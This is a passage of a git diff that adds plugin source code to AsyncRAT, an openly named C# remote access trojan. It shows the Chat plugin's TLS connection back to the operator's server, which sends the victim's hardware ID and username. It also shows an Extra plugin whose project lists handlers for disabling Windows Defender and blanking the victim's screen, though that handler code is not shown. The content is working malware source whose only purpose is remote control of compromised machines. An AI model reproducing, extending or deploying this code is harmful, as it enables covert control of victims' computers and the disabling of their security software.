<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

35
AsyncRAT-C#/MessagePack/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,35 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

25
AsyncRAT-C#/Plugin/Chat/Chat.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29123.88
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Chat", "Chat\Chat.csproj", "{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {EF9C58BD-EA3A-4488-A8CD-871D19820CE4}
EndGlobalSection
EndGlobal

88
AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj Normal file
View File

@ -0,0 +1,88 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>Chat</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Connection.cs" />
<Compile Include="FormChat.cs">
<SubType>Form</SubType>
</Compile>
<Compile Include="FormChat.Designer.cs">
<DependentUpon>FormChat.cs</DependentUpon>
</Compile>
<Compile Include="Packet.cs" />
<Compile Include="Plugin.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="FormChat.resx">
<DependentUpon>FormChat.cs</DependentUpon>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
<PropertyGroup>
<ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
</PropertyGroup>
<Error Condition="!Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props'))" />
<Error Condition="!Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets'))" />
</Target>
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.targets')" />
</Project>

225
AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs Normal file
View File

@ -0,0 +1,225 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient()
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "chat-";
msgpack.ForcePathObject("Hwid").AsString = Hwid;
Send(msgpack.Encode2Bytes());
new HandlerChat().CreateChat();
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
return;
}
}
catch
{
IsConnected = false;
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
SslClient.Flush();
}
}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

2
AsyncRAT-C#/Client/Helper/FormChat.Designer.cs → AsyncRAT-C#/Plugin/Chat/Chat/FormChat.Designer.cs generated
View File

@ -1,4 +1,4 @@
namespace Client.Helper
namespace Plugin
{
partial class FormChat
{

21
AsyncRAT-C#/Client/Helper/FormChat.cs → AsyncRAT-C#/Plugin/Chat/Chat/FormChat.cs
View File

@ -1,16 +1,13 @@
using Client.Handle_Packet;
using Client.MessagePack;
using Client.Connection;
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace Client.Helper
namespace Plugin
{
public partial class FormChat : Form
{
@ -26,8 +23,9 @@ namespace Client.Helper
richTextBox1.AppendText("Me: " + textBox1.Text + Environment.NewLine);
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "chat";
msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("WriteInput").AsString = Environment.UserName + ": " + textBox1.Text + Environment.NewLine;
ClientSocket.Send(msgpack.Encode2Bytes());
Connection.Send(msgpack.Encode2Bytes());
textBox1.Clear();
}
}
@ -39,7 +37,16 @@ namespace Client.Helper
private void Timer1_Tick(object sender, EventArgs e)
{
if (!ClientSocket.IsConnected) Packet.GetFormChat.Dispose();
if (!Connection.IsConnected)
{
Packet.GetFormChat.Invoke((MethodInvoker)(() =>
{
Packet.GetFormChat?.Close();
Packet.GetFormChat?.Dispose();
}));
Connection.Disconnected();
GC.Collect();
}
}
}
}

0
AsyncRAT-C#/Client/Helper/FormChat.resx → AsyncRAT-C#/Plugin/Chat/Chat/FormChat.resx
View File

67
AsyncRAT-C#/Plugin/Chat/Chat/ILMerge.props Normal file
View File

@ -0,0 +1,67 @@
<?xml version="1.0" encoding="utf-8" ?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<!-- -->
<!-- ILMerge project-specific settings. Almost never need to be set explicitly. -->
<!-- for details, see http://research.microsoft.com/en-us/people/mbarnett/ilmerge.aspx -->
<!-- -->
<!-- *** set this file to Type=None, CopyToOutput=Never *** -->
<!-- If True, all copy local dependencies will also be merged from referenced projects whether they are referenced in the current project explicitly or not -->
<ILMergeTransitive>true</ILMergeTransitive>
<!-- Extra ILMerge library paths (semicolon-separated). Dont put your package dependencies here, they will be added automagically -->
<ILMergeLibraryPath></ILMergeLibraryPath>
<!-- The solution NuGet package directory if not standard 'SOLUTION\packages' -->
<ILMergePackagesPath></ILMergePackagesPath>
<!-- The merge order file name if differs from standard 'ILMergeOrder.txt' -->
<ILMergeOrderFile></ILMergeOrderFile>
<!-- The strong key file name if not specified in the project -->
<ILMergeKeyFile></ILMergeKeyFile>
<!-- The assembly version if differs for the version of the main assembly -->
<ILMergeAssemblyVersion></ILMergeAssemblyVersion>
<!-- added in Version 1.0.4 -->
<ILMergeFileAlignment></ILMergeFileAlignment>
<!-- added in Version 1.0.4, default=none -->
<ILMergeAllowDuplicateType></ILMergeAllowDuplicateType>
<!-- If the <see cref="CopyAttributes"/> is also set, any assembly-level attributes names that have the same type are copied over into the target assembly -->
<ILMergeAllowMultipleAssemblyLevelAttributes></ILMergeAllowMultipleAssemblyLevelAttributes>
<!-- See ILMerge documentation -->
<ILMergeAllowZeroPeKind></ILMergeAllowZeroPeKind>
<!-- The assembly level attributes of each input assembly are copied over into the target assembly -->
<ILMergeCopyAttributes></ILMergeCopyAttributes>
<!-- Creates a .pdb file for the output assembly and merges into it any .pdb files found for input assemblies, default=true -->
<ILMergeDebugInfo>false</ILMergeDebugInfo>
<!-- Target assembly will be delay signed -->
<ILMergeDelaySign></ILMergeDelaySign>
<!-- Types in assemblies other than the primary assembly have their visibility modified -->
<ILMergeInternalize></ILMergeInternalize>
<!-- The path name of the file that will be used to identify types that are not to have their visibility modified -->
<ILMergeInternalizeExcludeFile></ILMergeInternalizeExcludeFile>
<!-- XML documentation files are merged to produce an XML documentation file for the target assembly -->
<ILMergeXmlDocumentation></ILMergeXmlDocumentation>
<!-- External assembly references in the manifest of the target assembly will use full public keys (false) or public key tokens (true, default value) -->
<ILMergePublicKeyTokens></ILMergePublicKeyTokens>
<!-- Types with the same name are all merged into a single type in the target assembly -->
<ILMergeUnionMerge></ILMergeUnionMerge>
<!-- The version of the target framework, default 40 (works for 45 too) -->
<ILTargetPlatform></ILTargetPlatform>
</PropertyGroup>
</Project>

4
AsyncRAT-C#/Plugin/Chat/Chat/ILMergeOrder.txt Normal file
View File

@ -0,0 +1,4 @@
# this file contains the partial list of the merged assemblies in the merge order
# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
# and finetune merge order to your satisfaction

86
AsyncRAT-C#/Plugin/Chat/Chat/Packet.cs Normal file
View File

@ -0,0 +1,86 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace Plugin
{
public static class Packet
{
public static FormChat GetFormChat;
public static void Read(object data)
{
try
{
MsgPack unpack_msgpack = new MsgPack();
unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{
case "chat":
{
new HandlerChat().CreateChat();
break;
}
case "chatWriteInput":
{
new HandlerChat().WriteInput(unpack_msgpack);
break;
}
case "chatExit":
{
new HandlerChat().ExitChat();
break;
}
}
}
catch { }
}
}
public class HandlerChat
{
public void CreateChat()
{
new Thread(() =>
{
Packet.GetFormChat = new FormChat();
Packet.GetFormChat.ShowDialog();
}).Start();
}
public void WriteInput(MsgPack unpack_msgpack)
{
if (Packet.GetFormChat.InvokeRequired)
{
Packet.GetFormChat.Invoke((MethodInvoker)(() =>
{
Console.Beep();
Packet.GetFormChat.richTextBox1.AppendText(unpack_msgpack.ForcePathObject("Input").AsString + Environment.NewLine);
}));
}
}
public void ExitChat()
{
if (Packet.GetFormChat.InvokeRequired)
{
Packet.GetFormChat.Invoke((MethodInvoker)(() =>
{
Packet.GetFormChat?.Close();
Packet.GetFormChat?.Dispose();
}));
}
Connection.Disconnected();
GC.Collect();
}
}
}

33
AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs Normal file
View File

@ -0,0 +1,33 @@
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;
new Thread(() =>
{
Connection.InitializeClient();
}).Start();
while (Connection.IsConnected)
{
Thread.Sleep(1000);
}
}
}
}

36
AsyncRAT-C#/Plugin/Chat/Chat/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
//[assembly: Guid("ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

5
AsyncRAT-C#/Plugin/Chat/Chat/packages.config Normal file
View File

@ -0,0 +1,5 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="ILMerge" version="3.0.29" targetFramework="net40" />
<package id="MSBuild.ILMerge.Task" version="1.1.3" targetFramework="net40" />
</packages>

25
AsyncRAT-C#/Plugin/Extra/Extra.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29123.88
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Extra", "Extra\Extra.csproj", "{424B81BE-2FAC-419F-B4BC-00CCBE38491F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Debug|Any CPU.Build.0 = Debug|Any CPU
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.ActiveCfg = Release|Any CPU
{424B81BE-2FAC-419F-B4BC-00CCBE38491F}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {4987DF63-DF17-42CF-AB54-BDFDA9768CF0}
EndGlobalSection
EndGlobal

222
AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs Normal file
View File

@ -0,0 +1,222 @@
using MessagePackLib.MessagePack;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net.Security;
using System.Net.Sockets;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
using System.Text;
using System.Threading;
namespace Plugin
{
public static class Connection
{
public static Socket TcpClient { get; set; }
public static SslStream SslClient { get; set; }
public static X509Certificate2 ServerCertificate { get; set; }
private static byte[] Buffer { get; set; }
private static long HeaderSize { get; set; }
private static long Offset { get; set; }
private static Timer Tick { get; set; }
public static bool IsConnected { get; set; }
private static object SendSync { get; } = new object();
public static string Hwid { get; set; }
public static void InitializeClient(byte[] packet)
{
try
{
TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
{
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
if (TcpClient.Connected)
{
Debug.WriteLine("Plugin Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
new Thread(() =>
{
Packet.Read(packet);
}).Start();
}
else
{
IsConnected = false;
return;
}
}
catch
{
Debug.WriteLine("Disconnected!");
IsConnected = false;
return;
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return ServerCertificate.Equals(certificate);
}
public static void Disconnected()
{
try
{
IsConnected = false;
Tick?.Dispose();
SslClient?.Dispose();
TcpClient?.Dispose();
GC.Collect();
}
catch { }
}
public static void ReadServertData(IAsyncResult ar) //Socket read/recevie
{
try
{
if (!TcpClient.Connected || !IsConnected)
{
IsConnected = false;
return;
}
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
Offset += recevied;
HeaderSize -= recevied;
if (HeaderSize == 0)
{
HeaderSize = BitConverter.ToInt32(Buffer, 0);
Debug.WriteLine("/// Plugin Buffersize " + HeaderSize.ToString() + " Bytes ///");
if (HeaderSize > 0)
{
Offset = 0;
Buffer = new byte[HeaderSize];
while (HeaderSize > 0)
{
int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize);
if (rc <= 0)
{
IsConnected = false;
return;
}
Offset += rc;
HeaderSize -= rc;
if (HeaderSize < 0)
{
IsConnected = false;
return;
}
}
Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
thread.Start(Buffer);
Offset = 0;
HeaderSize = 4;
Buffer = new byte[HeaderSize];
}
else
{
HeaderSize = 4;
Buffer = new byte[HeaderSize];
Offset = 0;
}
}
else if (HeaderSize < 0)
{
IsConnected = false;
return;
}
SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null);
}
else
{
IsConnected = false;
return;
}
}
catch
{
IsConnected = false;
return;
}
}
public static void Send(byte[] msg)
{
lock (SendSync)
{
try
{
if (!IsConnected || msg == null)
{
return;
}
byte[] buffersize = BitConverter.GetBytes(msg.Length);
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(buffersize, 0, buffersize.Length);
if (msg.Length > 1000000) //1mb
{
Debug.WriteLine("send chunks");
using (MemoryStream memoryStream = new MemoryStream(msg))
{
int read = 0;
memoryStream.Position = 0;
byte[] chunk = new byte[50 * 1000];
while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0)
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(chunk, 0, read);
SslClient.Flush();
}
}
}
else
{
TcpClient.Poll(-1, SelectMode.SelectWrite);
SslClient.Write(msg, 0, msg.Length);
SslClient.Flush();
}
Debug.WriteLine("Plugin Packet Sent");
}
catch
{
IsConnected = false;
return;
}
}
}
public static void CheckServer(object obj)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping!)";
Send(msgpack.Encode2Bytes());
GC.Collect();
}
}
}

80
AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj Normal file
View File

@ -0,0 +1,80 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props" Condition="Exists('..\..\..\packages\MSBuild.ILMerge.Task.1.1.3\build\MSBuild.ILMerge.Task.props')" />
<Import Project="..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props" Condition="Exists('..\..\..\packages\ILMerge.3.0.29\build\ILMerge.props')" />
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{424B81BE-2FAC-419F-B4BC-00CCBE38491F}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Plugin</RootNamespace>
<AssemblyName>Extra</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
<NuGetPackageImportStamp>
</NuGetPackageImportStamp>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>..\..\..\Binaries\Debug\Plugins\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>..\..\..\Binaries\Release\Plugins\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Connection.cs" />
<Compile Include="Handler\HandleBlankScreen.cs" />
<Compile Include="Handler\HandleDisableDefender.cs" />
<Compile Include="Handler\Wallpaper.cs" />
<Compile Include="Packet.cs" />
<Compile Include="Plugin.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\..\..\MessagePack\MessagePackLib.csproj">
<Project>{DC199D9E-CF10-41DD-BBCD-98E71BA8679D}</Project>
<Name>MessagePackLib</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<None Include="ILMerge.props" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
